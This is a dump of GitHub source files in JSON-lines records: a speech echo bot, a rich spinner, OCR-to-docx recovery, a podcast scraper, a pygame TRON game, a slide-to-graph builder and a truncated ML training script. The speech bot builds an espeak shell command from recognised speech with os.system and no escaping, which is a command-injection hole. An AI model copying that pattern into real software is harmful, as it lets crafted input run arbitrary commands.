return the final w from the penalized logistic regression, with lambda_ as a non 0 value\"\"\"\n return logistic_regression_helper(y, tx, gamma, max_iters, lambda_, tX_ori, y_ori, init_w)\n","repo_name":"franksun007/ML_Project1","sub_path":"src/python/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"13711762693","text":"import os\nimport speech_recognition as sr\n\ndef speak(text, voice):\n os.system(\"espeak -v {} '{}'\".format(voice, text))\n\ndef listen():\n # Inizializza un riconoscitore vocale\n r = sr.Recognizer()\n\n # Usa il microfono come sorgente audio\n with sr.Microphone() as source:\n print(\"Dimmi qualcosa!\")\n audio = r.listen(source)\n\n try:\n # Riconosci il testo dall'audio\n text = r.recognize_google(audio)\n return text\n except sr.UnknownValueError:\n print(\"Non ho capito cosa hai detto.\")\n except sr.RequestError as e:\n print(\"Impossibile completare la richiesta: {}\".format(e))\n\nif __name__ == '__main__':\n # Imposta la voce desiderata\n voice = 'en-scottish'\n\n # Inizia la conversazione\n while True:\n # Ascolta l'input vocale\n input_text = listen()\n print(\"Hai detto: {}\".format(input_text))\n\n # Esegui la sintesi vocale in risposta\n response_text = \"Hai detto: {}\".format(input_text)\n speak(response_text, voice)\n","repo_name":"Miciox5/ChatBot-Piton","sub_path":"Trial/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"25119751284","text":"\"\"\"UI spinner functions.\"\"\"\nfrom types import TracebackType\nfrom typing import Optional, Type\n\nfrom rich.progress import Progress, SpinnerColumn, TextColumn, TimeElapsedColumn\n\nSPINNER = \"dots\"\n\n\nclass Spinner:\n \"\"\"Spinner from rich.\n\n Implements a context manager interface using the __enter__() and __exit__() methods.\n \"\"\"\n\n status: str\n progress: Progress\n\n def __init__(self, status: str):\n \"\"\"Initialize a spinner using Progress.\n\n Args:\n status (str): task description\n \"\"\"\n self.status = status\n self.progress = Progress(\n SpinnerColumn(spinner_name=SPINNER),\n TimeElapsedColumn(),\n TextColumn(\"[progress.description]{task.description}\"),\n )\n self.progress.add_task(description=status, total=None)\n\n def __enter__(self) -> \"Spinner\":\n \"\"\"Call when a spinner object is created using a `with` statement.\n\n Returns:\n Spinner: the instance for a context manager.\n \"\"\"\n self.progress.start()\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n \"\"\"Called when the with block is exited to stop the progress spinner.\"\"\"\n self.progress.stop()\n","repo_name":"fuzzylabs/matcha","sub_path":"src/matcha_ml/cli/ui/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"56"} +{"seq_id":"23655328863","text":"import os\nfrom copy import deepcopy\nimport shutil\nfrom docx import Document\nfrom docx import shared\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.section import WD_SECTION\nfrom docx.oxml.ns import qn\nfrom docx.enum.table import WD_TABLE_ALIGNMENT\n\nfrom structure.recovery.table_process import HtmlToDocx\n\nfrom 
utils.logging import get_logger\nlogger = get_logger()\n\n\ndef convert_info_docx(img, res, save_folder, img_name):\n    figure_dir = 'static/output/figure/'\n    for filename in os.listdir(figure_dir):\n        file_path = os.path.join(figure_dir, filename)\n        try:\n            if os.path.isfile(file_path) or os.path.islink(file_path):\n                os.unlink(file_path)\n            elif os.path.isdir(file_path):\n                shutil.rmtree(file_path)\n        except Exception as e:\n            print('Failed to delete %s. Reason: %s' % (file_path, e))\n    doc = Document()\n    doc.styles['Normal'].font.name = 'Times New Roman'\n    doc.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'宋体')\n    doc.styles['Normal'].font.size = shared.Pt(6.5)\n    html_file = open('static/output/html/docx_output.html', 'w', encoding='utf8')\n    # text_file.write(text)\n\n    flag = 1\n    for i, region in enumerate(res):\n        img_idx = region['img_idx']\n        if flag == 2 and region['layout'] == 'single':\n            section = doc.add_section(WD_SECTION.CONTINUOUS)\n            section._sectPr.xpath('./w:cols')[0].set(qn('w:num'), '1')\n            flag = 1\n        elif flag == 1 and region['layout'] == 'double':\n            section = doc.add_section(WD_SECTION.CONTINUOUS)\n            section._sectPr.xpath('./w:cols')[0].set(qn('w:num'), '2')\n            flag = 2\n\n        if region['type'].lower() == 'figure':\n            excel_save_folder = os.path.join(save_folder, img_name)\n            img_path = os.path.join(excel_save_folder,\n                                    '{}_{}.jpg'.format(region['bbox'], img_idx))\n            shutil.copy2(img_path, figure_dir)\n            \n            html_img_path = '../figure/' + img_path.split('/')[-1]\n            paragraph_pic = doc.add_paragraph()\n            paragraph_pic.alignment = WD_ALIGN_PARAGRAPH.CENTER\n            run = paragraph_pic.add_run(\"\")\n            if flag == 1:\n                run.add_picture(img_path, width=shared.Inches(5))\n            elif flag == 2:\n                run.add_picture(img_path, width=shared.Inches(2))\n            html_line = '<img src=\"{}\"/>'.format(html_img_path)\n            html_file.write(html_line)\n        elif region['type'].lower() == 'title':\n            doc.add_heading(region['res'][0]['text'])\n            html_line = '
<h2>{}</h2>
'.format(region['res'][0]['text'])\n html_file.write(html_line)\n elif region['type'].lower() == 'table':\n parser = HtmlToDocx()\n parser.table_style = 'TableGrid'\n parser.handle_table(region['res']['html'], doc)\n html_file.write(region['res']['html'])\n else:\n paragraph = doc.add_paragraph()\n paragraph_format = paragraph.paragraph_format\n text_line = ''\n for i, line in enumerate(region['res']):\n if i == 0:\n paragraph_format.first_line_indent = shared.Inches(0.25)\n text_run = paragraph.add_run(line['text'] + ' ')\n text_line = text_line + line['text'] + ' '\n text_run.font.size = shared.Pt(10)\n if len(line['text']) > 5:\n html_line = '
<p>{}</p>
'.format(text_line)\n html_file.write(html_line)\n text_line = ''\n table_style = \"\"\n html_file.write(table_style) \n html_file.close()\n # save to docx\n docx_save_path = os.path.join(save_folder, img_name)\n docx_path = os.path.join(docx_save_path, '{}_ocr.docx'.format(img_name))\n doc.save(docx_path)\n logger.info('docx save to {}'.format(docx_path))\n return docx_path\n\n\ndef sorted_layout_boxes(res, w):\n \"\"\"\n Sort text boxes in order from top to bottom, left to right\n args:\n res(list):structure results\n return:\n sorted results(list)\n \"\"\"\n num_boxes = len(res)\n if num_boxes == 1:\n res[0]['layout'] = 'single'\n return res\n\n sorted_boxes = sorted(res, key=lambda x: (x['bbox'][1], x['bbox'][0]))\n _boxes = list(sorted_boxes)\n\n new_res = []\n res_left = []\n res_right = []\n i = 0\n\n while True:\n if i >= num_boxes:\n break\n if i == num_boxes - 1:\n if _boxes[i]['bbox'][1] > _boxes[i - 1]['bbox'][3] and _boxes[i][\n 'bbox'][0] < w / 2 and _boxes[i]['bbox'][2] > w / 2:\n new_res += res_left\n new_res += res_right\n _boxes[i]['layout'] = 'single'\n new_res.append(_boxes[i])\n else:\n if _boxes[i]['bbox'][2] > w / 2:\n _boxes[i]['layout'] = 'double'\n res_right.append(_boxes[i])\n new_res += res_left\n new_res += res_right\n elif _boxes[i]['bbox'][0] < w / 2:\n _boxes[i]['layout'] = 'double'\n res_left.append(_boxes[i])\n new_res += res_left\n new_res += res_right\n res_left = []\n res_right = []\n break\n elif _boxes[i]['bbox'][0] < w / 4 and _boxes[i]['bbox'][2] < 3 * w / 4:\n _boxes[i]['layout'] = 'double'\n res_left.append(_boxes[i])\n i += 1\n elif _boxes[i]['bbox'][0] > w / 4 and _boxes[i]['bbox'][2] > w / 2:\n _boxes[i]['layout'] = 'double'\n res_right.append(_boxes[i])\n i += 1\n else:\n new_res += res_left\n new_res += res_right\n _boxes[i]['layout'] = 'single'\n new_res.append(_boxes[i])\n res_left = []\n res_right = []\n i += 1\n if res_left:\n new_res += res_left\n if res_right:\n new_res += res_right\n return new_res\n","repo_name":"quangduy392/FSIE","sub_path":"structure/recovery/recovery_to_doc.py","file_name":"recovery_to_doc.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10880268562","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 28 20:42:34 2021\n\n@author: wengliangchong\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport pandas as pd\n\ndef to_int(value):\n if 'K' in value:\n return(int(float(value.replace('K', ''))*1000))\n elif 'M' in value:\n return(int(float(value.replace('M', ''))*1000000))\n elif 'B' in value:\n return(int(float(value.replace('B', ''))*1000000000))\n else:\n return(int(value))\n\ndef scrape(link):\n try:\n page = requests.get(link, timeout=20)\n soup = BeautifulSoup(page.content, \"lxml\")\n try:\n title = soup.find('h1').find('span').text.strip()\n except Exception:\n print(\"Missing title: \", link)\n title = \"\"\n try:\n producer = soup.find('h1').find('a').text.strip()\n except Exception:\n try:\n producer = soup.find('h1').find('span', class_='product-header__identity podcast-header__identity').text.strip()\n except Exception:\n print(\"Missing producder: \", link)\n producer = \"\"\n try:\n genre = soup.find('li', class_='inline-list__item inline-list__item--bulleted').text.strip()\n except Exception:\n print(\"Missing genre: \", link)\n genre = \"\"\n try:\n rating = float(soup.find('span', 
class_=\"we-customer-ratings__averages__display\").text.strip())\n except Exception:\n print(\"Missing rating: \", link)\n rating = 0.0\n try:\n num_ratings = to_int(soup.find('div', class_=\"we-customer-ratings__count small-hide medium-show\").text.strip().strip('Ratings'))\n except Exception:\n print(\"Missing number of ratings: \", link)\n num_ratings = 0\n try:\n num_episodes = int(soup.find('div', class_=\"product-artwork__caption small-hide medium-show\").text.strip().strip('episodes').replace(',', ''))\n except Exception:\n print(\"Missing number of episodes: \", link)\n num_episodes = 0\n try:\n description = soup.find('div', class_=\"product-hero-desc product-hero-desc--spacer-bottom-large product-hero-desc--side-bar\").text.strip()\n except Exception:\n print(\"Missing description: \", link)\n description = \"\"\n except Exception:\n print(\"Link not working:\", link)\n details = {\n 'title': title,\n 'producer': producer,\n 'genre': genre,\n 'rating': rating,\n 'num_ratings': num_ratings,\n 'num_episodes': num_episodes,\n 'description': description\n }\n return details\n\npodcasts_dict = []\ncounter = 1\n\n\"\"\"\nwith open('all_podcast_links.json') as file:\n links = json.load(file)\n for link in links:\n try:\n podcast_info = scrape(link)\n podcast_info['link'] = link\n podcasts_dict.append(podcast_info)\n if counter % 50 == 0:\n print(counter, 'podcasts done.')\n counter += 1\n except Exception:\n print(link, 'failed.')\n counter += 1\n pass\n\nwith open('./data/json/podcast_info.json', 'w') as outfile:\n json.dump(podcasts_dict, outfile)\n\"\"\"\n\nwith open('../data/json/podcast_info.json') as file:\n podcasts = json.load(file)\n\ndf = pd.DataFrame(podcasts)\nmissing_df = df[df['title'].values == '']\n\nfor index, row in missing_df.iterrows():\n try:\n podcast_info = scrape(row.link)\n podcast_info['link'] = row.link\n podcasts_dict.append(podcast_info)\n print(counter, 'podcasts done.')\n counter += 1\n except Exception:\n print(row.link, 'failed.')\n counter += 1\n pass\n\nwith open('../data/json/podcast_info_add.json', 'w') as outfile:\n json.dump(podcasts_dict, outfile)\n\n","repo_name":"Peter-Chong/Podcast-Recommendation-System","sub_path":"scraper/podcast_info_scraper.py","file_name":"podcast_info_scraper.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"72863068334","text":"def binary_search(end, arr, val):\n start = 0\n while(start<=end):\n mid = int((start+end)/2)\n if arr[mid]>val:\n ans = mid\n end = mid-1\n else:\n start = mid+1\n return ans\n \nT = int(input())\nfor i in range(T):\n N = int(input())\n A = list(map(int, input().split()))\n stack = []\n stack.append(A[0])\n for j in range(1, N):\n if stack[-1]>A[j]:\n stack[binary_search(len(stack)-1,stack, A[j])] = A[j]\n else:\n stack.append(A[j])\n print(len(stack), *stack)","repo_name":"hhhrrrttt222111/CodeChef","sub_path":"Easy/Stacks of Disc/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"56"} +{"seq_id":"41930449045","text":"\"\"\"\"TRON\r\n\r\nDeux motos génèrent des traces derrière eux, et qui ne peut pas être franchi \r\n\r\nLa trace est représenter\r\n\r\n\"\"\"\r\nfrom dis import dis\r\nimport os\r\nimport pygame\r\nimport math\r\npygame.init()\r\nos.chdir('assets')\r\nmoto1image = pygame.image.load('Player1.png')\r\nmoto2image = pygame.image.load('Player2.png')\r\nclock = 
pygame.time.Clock()\r\n\r\npygame.display.set_caption(\"TRON\", 'moto.png')\r\nscreen = pygame.display.set_mode((500, 500))\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n \r\n self.moto1 = Moto(moto1image,50 - moto1image.get_width() / 2,screen.get_height() / 2 - moto1image.get_height() / 2,[pygame.K_d,pygame.K_a,pygame.K_s,pygame.K_w],(255,0,0),180,\"red\")\r\n self.moto2 = Moto(moto2image,screen.get_width() - 50 - moto1image.get_width() / 2,screen.get_height() / 2 - moto1image.get_height() / 2,[pygame.K_RIGHT,pygame.K_LEFT,pygame.K_DOWN,pygame.K_UP],(0,0,255),0,\"blue\")\r\n\r\ndef dist(xa,ya,xb,yb):\r\n return math.sqrt((xb - xa)**2 + (yb - ya)**2)\r\n\r\nclass Moto(pygame.sprite.Sprite):\r\n def __init__(self,img,posx,posy,touches,couleur,rotation,name):\r\n super().__init__()\r\n self.name = name\r\n self.health = 1\r\n self.max_health = 1\r\n self.velocity = 2\r\n self.base_image = img\r\n self.image = pygame.transform.rotate(self.base_image,rotation)\r\n self.rect = self.image.get_rect()\r\n self.rect.x = posx\r\n self.rect.y = posy\r\n self.dir = (0,0)\r\n if rotation == 0:\r\n self.dir = (-1,0)\r\n elif rotation == 180:\r\n self.dir = (1,0)\r\n self.line_points = [self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2]\r\n self.line_rect = []\r\n self.touches = touches\r\n self.color = couleur\r\n\r\n self.points = [self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2]\r\n self.maxpoints = 30\r\n self.d_entre_pts = 1\r\n self.points_distance = 1\r\n self.point_connecte = []\r\n def left(self):\r\n if self.dir == (-1,0):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 0)\r\n rect_b = self.image.get_rect()\r\n \r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(0,1),(0,-1))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (-1,0)\r\n\r\n def down(self):\r\n if self.dir == (0,-1):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 90)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(1,0),(-1,0))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (0,-1) \r\n\r\n def right(self):\r\n if self.dir == (1,0):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 180)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(0,1),(0,-1))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (1,0)\r\n\r\n def up(self):\r\n if self.dir == (0,1):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 270)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(1,0),(-1,0))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (0,1)\r\n\r\n def moto_controller(self,event):\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == self.touches[0]:\r\n self.right()\r\n 
elif event.key == self.touches[1]:\r\n self.left()\r\n elif event.key == self.touches[2]:\r\n self.down()\r\n elif event.key == self.touches[3]:\r\n self.up() \r\n def move(self):\r\n self.rect.x += self.dir[0] * self.velocity\r\n self.rect.y -= self.dir[1] * self.velocity\r\n screen.blit(self.image, self.rect)\r\n\r\n def draw_trail(self):\r\n self.line_rect.clear()\r\n if dist(self.points[-2],self.points[-1],self.rect.x + self.image.get_width() / 2,self.rect.y + self.image.get_height() / 2) > self.d_entre_pts:\r\n if int(len(self.points) / 2) >= self.maxpoints:\r\n del self.points[0]\r\n del self.points[0]\r\n self.points.append(self.rect.x + self.image.get_width() / 2)\r\n self.points.append(self.rect.y + self.image.get_height() / 2)\r\n if int(len(self.points)) > 4:\r\n for i in range(0,int(len(self.points)) - 4,2):\r\n pygame.draw.line(screen,self.color,(self.points[i],self.points[i+1]),(self.points[i+2],self.points[i+3]),1)\r\n for i in range(0,int(len(self.line_points)),2):\r\n pygame.draw.circle(screen,self.color,(self.line_points[i],self.line_points[i+1]),2)\r\n \r\n coins_possibles = []\r\n for i in range(0,int(len(self.line_points)),2):\r\n if self.check_coin(self.line_points[i],self.line_points[i+1]) == True or self.point_connecte.count(i) > 0:\r\n coins_possibles.append(self.line_points[i])\r\n coins_possibles.append(self.line_points[i+1])\r\n for i in range(0,int(len(coins_possibles)) - 3,2):\r\n self.line_rect += pygame.draw.line(screen,self.color,(coins_possibles[i],coins_possibles[i+1]),(coins_possibles[i+2],coins_possibles[i+3]),5)\r\n if(self.point_connecte.count(i) == 0):\r\n self.point_connecte.append(i)\r\n\r\n if(len(coins_possibles)) > 1:\r\n self.line_rect += pygame.draw.line(screen,self.color,(coins_possibles[-2],coins_possibles[-1]),(self.points[0],self.points[1]),5)\r\n\r\n def check_coin(self,posx,posy):\r\n for i in range(0,int(len(self.points)),2):\r\n if not dist(posx,posy,self.points[i],self.points[i+1]) > self.points_distance:\r\n return False\r\n return True\r\n \r\n def get_collision(self):\r\n collisions.extend(self.line_rect)\r\n \r\n def apply_collision(self):\r\n hit_list = []\r\n for i in range(0,int(len(collisions)),4):\r\n rect = pygame.Rect(collisions[(i):(i+4)])\r\n if(self.rect.colliderect(rect)):\r\n hit_list.append(rect)\r\n if len(hit_list) != 0:\r\n print(self.name,\"COLLISION\")\r\ndef pos_apres_rot(dirbase,image,dir1,dir2):\r\n pos = [0,0]\r\n if(dirbase == dir1 or dirbase == dir2):\r\n pos[0] -= image.get_width() / 2 - image.get_height() / 2\r\n pos[1] += image.get_width() / 2 - image.get_height() / 2\r\n return pos\r\n\r\ndef fond(image):\r\n # /!\\ il faut que la largeur et longueur de la fenetre soit un multiple de 100 car le fond fait 100x100 px\r\n nb_x = int(screen.get_width() / 100)\r\n nb_y = int(screen.get_height() / 100)\r\n\r\n for x in range(nb_x):\r\n for y in range(nb_y):\r\n screen.blit(image, (x * 100, y * 100))\r\n\r\nson = pygame.mixer.Sound('music/music_TRON.wav')\r\nson.set_volume(0.1)\r\nson.play(loops=-1, maxtime=0, fade_ms=0)\r\n\r\nbg = pygame.image.load('bg.png')\r\ngame = Game()\r\nrunning = True\r\nwhile running:\r\n fond(bg)\r\n for event in pygame.event.get():\r\n game.moto1.moto_controller(event)\r\n game.moto2.moto_controller(event)\r\n if event.type == pygame.QUIT:\r\n run = False\r\n pygame.quit()\r\n game.moto1.draw_trail()\r\n game.moto2.draw_trail()\r\n game.moto1.move()\r\n game.moto2.move()\r\n collisions = []\r\n game.moto1.get_collision()\r\n game.moto2.get_collision()\r\n 
game.moto1.apply_collision()\r\n game.moto2.apply_collision()\r\n pygame.display.update() \r\n clock.tick(60)","repo_name":"Arthur9876/oc-2021","sub_path":"src/projet/projet4/TRON.py","file_name":"TRON.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"56"} +{"seq_id":"39787387908","text":"# ***** BEGIN GPL LICENSE BLOCK *****\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software Foundation,\r\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n#\r\n# The Original Code is Copyright (C) 2021, Wenqi Lu, Fayyaz Minhas, University of Warwick\r\n# All rights reserved.\r\n# ***** END GPL LICENSE BLOCK *****\r\n\r\nimport numpy as np\r\nimport os\r\nfrom scipy.spatial import Delaunay, KDTree\r\nfrom collections import defaultdict\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom torch_geometric.data import Data\r\nfrom scipy.cluster.hierarchy import fcluster\r\nfrom scipy.cluster import hierarchy\r\nfrom sklearn.neighbors import KDTree as sKDTree\r\nfrom tqdm import tqdm\r\nimport pickle\r\nUSE_CUDA = torch.cuda.is_available()\r\n\r\ndef cuda(v):\r\n if USE_CUDA:\r\n return v.cuda()\r\n return v\r\n\r\ndef toTensor(v,dtype = torch.float,requires_grad = True): \r\n device = 'cuda:0' \r\n return (Variable(torch.tensor(v)).type(dtype).requires_grad_(requires_grad)).to(device)\r\n\r\ndef connectClusters(Cc,dthresh = 3000):\r\n tess = Delaunay(Cc)\r\n neighbors = defaultdict(set)\r\n for simplex in tess.simplices:\r\n for idx in simplex:\r\n other = set(simplex)\r\n other.remove(idx)\r\n neighbors[idx] = neighbors[idx].union(other)\r\n nx = neighbors \r\n W = np.zeros((Cc.shape[0],Cc.shape[0]))\r\n for n in nx:\r\n nx[n] = np.array(list(nx[n]),dtype = np.int)\r\n nx[n] = nx[n][KDTree(Cc[nx[n],:]).query_ball_point(Cc[n],r = dthresh)]\r\n W[n,nx[n]] = 1.0\r\n W[nx[n],n] = 1.0 \r\n return W # neighbors of each cluster and an affinity matrix\r\n\r\ndef toGeometric(X,W,y,tt=0): \r\n return Data(x=toTensor(X,requires_grad = False), edge_index=(toTensor(W,requires_grad = False)>tt).nonzero().t().contiguous(),y=toTensor([y],dtype=torch.long,requires_grad = False))\r\n\r\nif __name__ == '__main__':\r\n # similarity parameters\r\n lambda_d = 3e-3 \r\n lambda_f = 1.0e-3\r\n lamda_h = 0.8 # Hierachical clustering distance threshold\r\n distance_thres = 4000\r\n feature_path = './example' # load x, y coordinates and features of patches in each WSI\r\n output_path = './graphs'\r\n for filename in tqdm(os.listdir(feature_path)):\r\n print(filename)\r\n ofile = os.path.join(output_path, filename[:-4] + '.pkl')\r\n if os.path.isfile(ofile):\r\n continue\r\n label = int(1)\r\n if filename.endswith(\".npz\"):\r\n d = np.load(feature_path + '/' + filename, allow_pickle=True)\r\n x, y, F = d['x_patch'], d['y_patch'], d['feature']\r\n ridx = (np.max(F, axis=0) - np.min(F, axis=0)) > 1e-4 # remove feature which does 
not change\r\n F = F[:, ridx]\r\n C = np.asarray(np.vstack((x, y)).T, dtype=np.int)\r\n TC = sKDTree(C)\r\n I, D = TC.query_radius(C, r=6 / lambda_d, return_distance=True, sort_results=True)\r\n DX = np.zeros(int(C.shape[0] * (C.shape[0] - 1) / 2))\r\n idx = 0\r\n for i in range(C.shape[0] - 1):\r\n f = np.exp(-lambda_f * np.linalg.norm(F[i] - F[I[i]], axis=1))\r\n d = np.exp(-lambda_d * D[i])\r\n df = 1 - f * d\r\n dfi = np.ones(C.shape[0])\r\n dfi[I[i]] = df\r\n dfi = dfi[i + 1:]\r\n DX[idx:idx + len(dfi)] = dfi\r\n idx = idx + len(dfi)\r\n d = DX\r\n\r\n # %%\r\n Z = hierarchy.linkage(d, method='average')\r\n clusters = fcluster(Z, lamda_h, criterion='distance')\r\n uc = list(set(clusters))\r\n C_cluster = []\r\n F_cluster = []\r\n for c in uc:\r\n idx = np.where(clusters == c)\r\n if C[idx, :].squeeze().size==2:\r\n C_cluster.append(list(np.round(C[idx, :].squeeze())))\r\n F_cluster.append(list(F[idx, :].squeeze()))\r\n else:\r\n C_cluster.append(list(np.round(C[idx, :].squeeze().mean(axis=0))))\r\n F_cluster.append(list(F[idx, :].squeeze().mean(axis=0)))\r\n C_cluster = np.array(C_cluster)\r\n F_cluster = np.array((F_cluster))\r\n\r\n W = connectClusters(C_cluster, dthresh=distance_thres)\r\n G = toGeometric(F_cluster, W, y=label)\r\n G.coords = toTensor(C_cluster, requires_grad=False)\r\n\r\n with open(ofile, 'wb') as f:\r\n pickle.dump(G, f)\r\n\r\n","repo_name":"wenqi006/SlideGraph","sub_path":"features_to_graph.py","file_name":"features_to_graph.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"56"} +{"seq_id":"22785463563","text":"import os.path as osp\nfrom statistics import LinearRegression\nimport warnings\nimport random\n\nfrom upyog.util.system import makepath, get_files\nfrom upyog.util.types import build_fn\nfrom upyog.util.ml import get_data_dir\nfrom upyog.log import get_logger\nfrom upyog.const import CPU_COUNT\nfrom upyog._compat import iterkeys\nfrom upyog import parallel\n\nfrom cobra.io.web import load_model as load_gemm\nfrom cobra.io import read_sbml_model\nfrom cobra.util import linear_reaction_coefficients\nimport cobra\n\n# import deeply\n\nfrom dgemm import settings, __name__ as NAME\nfrom dgemm import settings # , dops\n\nwarnings.filterwarnings(\"ignore\")\n\nlogger = get_logger(NAME)\n\ncobra_config = cobra.Configuration()\n\nfrom deeply.integrations.imports import import_ds_module\n\ndfl = import_ds_module(\"pandas\")\nKFold = import_ds_module(\"sklearn.model_selection.KFold\")\ntrain_test_split = import_ds_module(\"sklearn.model_selection.train_test_split\")\n\ndef build_model(artifacts_path = None):\n encoder_dropout_rate = settings.get(\"encoder_dropout_rate\")\n encoder_batch_norm = settings.get(\"encoder_batch_norm\")\n decoder_dropout_rate = settings.get(\"decoder_dropout_rate\")\n decoder_batch_norm = settings.get(\"decoder_batch_norm\")\n\n gan = deeply.hub(\"gan\", x = 100,\n encoder_dropout_rate = encoder_dropout_rate,\n encoder_batch_norm = encoder_batch_norm,\n decoder_dropout_rate = decoder_dropout_rate,\n decoder_batch_norm = decoder_batch_norm\n )\n \n if artifacts_path:\n path_plot = osp.join(artifacts_path, \"model.png\")\n makepath(path_plot)\n gan.plot(to_file = path_plot)\n\n return gan\n\nMODELS = [{\n \"class\": import_ds_module(\"sklearn.linear_model.LinearRegression\"),\n \"name\": \"linear-regression\"\n}, {\n \"class\": import_ds_module(\"sklearn.gaussian_process.GaussianProcessRegressor\"),\n \"name\": \"gaussian-process-regressor\"\n}, {\n 
\"class\": import_ds_module(\"sklearn.ensemble.RandomForestRegressor\"),\n \"name\": \"random-forest-regressor\" \n}, {\n \"class\": import_ds_module(\"sklearn.svm.SVR\"),\n \"name\": \"support-vector-regressor\" \n}, {\n \"class\": import_ds_module(\"sklearn.neural_network.MLPRegressor\"),\n \"name\": \"mlp-regressor\",\n \"params\": {\n \"hidden_layer_sizes\": (100,),\n \"verbose\": True\n }\n}]\n\ndef _train_model_step(model_meta, X_train, X_test, Y_train, Y_test, **kwargs):\n model = model_meta[\"class\"](**model_meta.get(\"params\", {}))\n k_fold = kwargs.get(\"k_fold\", settings.get(\"k_fold\"))\n\n logger.info(\"Watching model: %s\" % model_meta[\"name\"])\n # dops.watch(model)\n\n logger.info(\"Training model: %s\" % model_meta[\"name\"])\n\n k_fold = KFold(n_splits = k_fold, shuffle = True)\n\n for i, (train_index, test_index) in enumerate(k_fold.split(X_train)):\n x_train, x_val = X_train.iloc[train_index], X_train.iloc[test_index]\n y_train, y_val = Y_train.iloc[train_index], Y_train.iloc[test_index]\n\n logger.info(\"Training fold %d/%d\" % (i + 1, k_fold.n_splits))\n\n model.fit(x_train, y_train)\n\n logger.info(\"Model: %s, Fold: %d, Score: %.4f\" % (\n model_meta[\"name\"], i, model.score(x_val, y_val) * 100))\n\n logger.success(\"Successfully trained model: %s\" % model_meta[\"name\"])\n\n logger.info(\"Evaluating model...\")\n\n score = model.score(X_test, Y_test)\n\n logger.success(\"Successfully evaluated model: %s with score: %.4f\" % (model_meta[\"name\"], score * 100))\n\ndef _train_step(csv_path, data_dir = None, objective = False, n_y = None, *args, **kwargs):\n data_dir = get_data_dir(NAME, data_dir)\n jobs = kwargs.get(\"jobs\", settings.get(\"jobs\"))\n minimized = kwargs.get(\"minimized\", False)\n\n logger.info(\"Training on CSV file: %s\" % csv_path)\n\n test_size = kwargs.get(\"test_size\", settings.get(\"test_size\"))\n\n df = dfl.read_csv(csv_path)\n\n logger.success(\"Loaded CSV file: %s\" % csv_path)\n\n logger.info(\"Splitting data into train and test sets...\")\n train_df, test_df = train_test_split(df, test_size = test_size)\n\n logger.success(\"Successfully split data into train and test sets.\")\n\n X_columns = [column for column in df.columns if \"flux\" not in column]\n y_columns = []\n \n if objective or n_y:\n model_id = osp.splitext(osp.basename(csv_path))[0]\n\n cobra_config.cache_directory = data_dir\n\n if minimized:\n path_model = osp.join(data_dir, \"%s_minimized.xml\" % model_id)\n model_gemm = read_sbml_model(path_model)\n else:\n model_gemm = load_gemm(model_id)\n\n 